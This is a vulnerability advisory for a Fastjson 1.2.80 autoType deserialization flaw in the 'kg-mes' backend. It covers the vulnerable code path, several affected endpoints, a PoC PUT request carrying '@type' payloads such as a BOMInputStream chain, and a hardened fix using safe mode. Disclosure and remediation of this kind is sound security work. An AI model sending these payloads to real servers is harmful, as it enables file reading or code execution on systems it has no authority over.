### Critical Vulnerability Information

#### Vulnerability Type

Fastjson Deserialization Vulnerability

#### Affected Versions

- Fastjson Version: 1.2.80

#### Vulnerability Description

A Fastjson deserialization vulnerability exists in the `kg-mes` backend. In the code below, the `params` map taken from the JSON request body is serialized back to a string with `JSON.toJSONString` and then re-parsed with `JSONObject.parseObject`, so attacker-controlled `@type` markers reach Fastjson's autoType handling. This can be exploited to execute arbitrary code or read files.

#### Vulnerable Code Example

```java
// com.ktg.generator.controller.GenController#editSave
// Entry point: the whole request body is bound to GenTable, including its params map.
@PutMapping
public AjaxResult editSave(@Validated @RequestBody GenTable genTable) {
    genTableService.validateEdit(genTable);
    genTableService.updateGenTable(genTable);
    return AjaxResult.success();
}

// com.ktg.generator.service.IGenTableService#validateEdit
public void validateEdit(GenTable genTable) {
    if (GenConstants.TPL_TREE.equals(genTable.getTplCategory())) {
        // Sink: user-controlled params are re-serialized and then re-parsed by Fastjson,
        // so "@type" keys inside them are processed by autoType.
        String options = JSON.toJSONString(genTable.getParams());
        JSONObject paramsObj = JSONObject.parseObject(options);
        if (StringUtils.isEmpty(paramsObj.getString(GenConstants.TREE_CODE))) {
            throw new ServiceException("Tree code field cannot be empty");
        }
    }
}
```

#### Similar Vulnerability Entry Points

- `com.ktg.generator.controller.GenController#editSave`
- `com.ktg.mes.wm.controller.mobile.WmStockTakingMobController#add`
- `com.ktg.mes.wm.controller.mobile.WmStockTakingMobController#edit`
- `com.ktg.mes.wm.controller.WmStockTakingController#add`
- `com.ktg.mes.wm.controller.WmStockTakingController#edit`

#### PoC Example

The request below carries an `Admin-Token` cookie and a `Bearer` token, so the vulnerable endpoint is reached only with a valid session. The payload places `@type` markers both inside `params` and at the top level of the body.

```http
PUT /dev-api/tool/gen HTTP/1.1
Host: 10.157.131.188
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Admin-Token=eyJhb...
Authorization: Bearer eyJhbGciOiJIUzUxMiJ9...
Referer: http://10.157.131.188/tool/gen
Content-Type: application/json

{
  "aaa": "test",
  "tableName": "1",
  "tableComment": "2",
  "className": "3",
  "packageName": "4",
  "moduleName": "5",
  "functionName": "6",
  "functionAuthor": "7",
  "params": {
    "a": "{\"@type\": java.lang.Exception}",
    "b": {},
    "c": "{}",
    "d": {}
  },
  "abc": {
    "@type": "java.io.InputStream",
    "@type": "org.apache.commons.io.input.BOMInputStream"
  }
}
```
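#### Hardened Example

The following is an added example, not code from `kg-mes`, showing two ways to close the sink in `validateEdit`: read the tree-code key straight from the already-bound `params` map (no Fastjson parse at all), or, if a re-parse is unavoidable, parse through a `ParserConfig` in safe mode so `@type` is never resolved. It assumes `GenTable.getParams()` returns `Map<String, Object>` and that `GenConstants.TREE_CODE` is the string `"treeCode"`; both are assumptions for illustration. The `main` method builds a constructed input in the shape of the PoC to show the difference.

```java
import java.util.LinkedHashMap;
import java.util.Map;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.parser.ParserConfig;

/**
 * Added example (not kg-mes code): two ways to remove the Fastjson sink from validateEdit.
 * Assumption: GenTable.getParams() is a Map<String, Object> and the tree-code key is "treeCode".
 */
public class SafeTreeCodeCheck {

    static final String TREE_CODE = "treeCode"; // assumed value of GenConstants.TREE_CODE

    /** Preferred fix: read the key from the bound map; no JSON round trip, so no autoType. */
    public static String treeCodeWithoutReparse(Map<String, Object> params) {
        if (params == null) {
            return null;
        }
        Object value = params.get(TREE_CODE);
        return value == null ? null : String.valueOf(value);
    }

    /**
     * Fallback when a re-parse cannot be avoided: a ParserConfig in safe mode
     * (available since Fastjson 1.2.68) rejects "@type" unconditionally instead of
     * consulting the autoType allow/deny lists that the 1.2.80 payload bypasses.
     */
    public static String treeCodeWithSafeParse(Map<String, Object> params) {
        ParserConfig safeConfig = new ParserConfig();
        safeConfig.setSafeMode(true);
        String options = JSON.toJSONString(params);
        JSONObject obj = JSON.parseObject(options, JSONObject.class, safeConfig);
        return obj == null ? null : obj.getString(TREE_CODE);
    }

    /** Process-wide variant: call once at startup so every JSON.parseObject call is covered. */
    public static void enableGlobalSafeMode() {
        ParserConfig.getGlobalInstance().setSafeMode(true);
    }

    public static void main(String[] args) {
        // Constructed input mirroring the PoC shape: a nested object carrying "@type".
        Map<String, Object> nested = new LinkedHashMap<>();
        nested.put("@type", "java.lang.Exception");
        Map<String, Object> params = new LinkedHashMap<>();
        params.put(TREE_CODE, "node_code");
        params.put("a", nested);

        // Direct read never hands the payload to Fastjson.
        System.out.println("direct read: " + treeCodeWithoutReparse(params));

        // Safe-mode parse refuses the "@type" key instead of resolving the class.
        try {
            System.out.println("safe parse: " + treeCodeWithSafeParse(params));
        } catch (JSONException e) {
            System.out.println("safe parse rejected payload: " + e.getMessage());
        }
    }
}
```

The direct-read variant is the one to ship: the controller already has the map, so re-serializing and re-parsing it only adds an attack surface. Safe mode is a defence in depth for any remaining `parseObject` calls on user input; it does not replace upgrading Fastjson beyond 1.2.80.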